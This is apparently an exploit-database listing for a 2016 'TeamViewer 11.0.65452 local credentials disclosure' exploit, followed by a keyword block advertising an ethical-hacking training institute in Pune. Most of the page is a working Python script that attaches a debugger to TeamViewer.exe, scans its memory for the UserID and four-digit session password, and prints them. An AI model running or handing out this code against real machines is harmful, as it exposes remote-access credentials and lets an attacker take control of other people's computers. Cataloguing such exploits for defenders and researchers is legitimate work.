Filename |
TeamViewer 11.0.65452 (64 bit) - Local Credentials Disclosure Exploit |
Permission |
rw-r--r-- |
Author |
Unknown |
Date and Time |
9/09/2016 |
Label |
Exploit
|
Action |
|
Full title | TeamViewer 11.0.65452 (64 bit) - Local Credentials Disclosure Exploit |
Date add | 08-09-2016 |
Category | local exploits |
Platform | windows |
Risk |
Security Risk High
|
from
winappdbg
import
Debug, Process, HexDump
import
sys
import
re
filename
=
'TeamViewer.exe'
def
memory_search( pid ):
found
=
[]
process
=
Process( pid )
userid_pattern
=
'([0-9]\x00){3} \x00([0-9]\x00){3} \x00([0-9]\x00){3}[^)]'
for
address
in
process.search_regexp( userid_pattern ):
found
+
=
[address]
print
'Possible UserIDs found:'
found
=
[i[
-
1
]
for
i
in
found]
for
i
in
set
(found):
print
i.replace(
'\x00'
,'')
found
=
[]
pass_pattern
=
'([0-9]\x00){4}\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x07\x00\x00'
for
address
in
process.search_regexp( pass_pattern ):
found
+
=
[process.read(address[
0
]
-
3
,
16
)]
if
found:
print
'\nPassword:'
if
len
(found) >
1
:
s
=
list
(
set
([x
for
x
in
found
if
found.count(x) >
1
]))
for
i
in
s:
pwd
=
re.findall(
'[0-9]{4}'
,i.replace(
'\x00'
,''))[
0
]
print
pwd
else
:
print
re.findall(
'[0-9]{4}'
,found[
0
].replace(
'\x00'
,''))[
0
]
return
found
debug
=
Debug()
try
:
debug.system.scan_processes()
for
( process, name )
in
debug.system.find_processes_by_filename( filename ):
pid
=
process.get_pid()
memory_search(pid)
finally
:
debug.stop()
Cyber Suraksha Abhiyan, CEHv9, CHFI, ECSAv9, CAST, ENSA, CCNA, CCNA SECURITY, MCITP, RHCE, CHECKPOINT, ASA FIREWALL, VMWARE, CLOUD, ANDROID Hacking, IPHONE Hacking, NETWORKING HARDWARE,TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking,Center For Advanced Security Training in India, ceh v9 course in Pune-India, ceh certification in pune-India, ceh v9 training in Pune-India, Ethical Hacking Course in Pune-India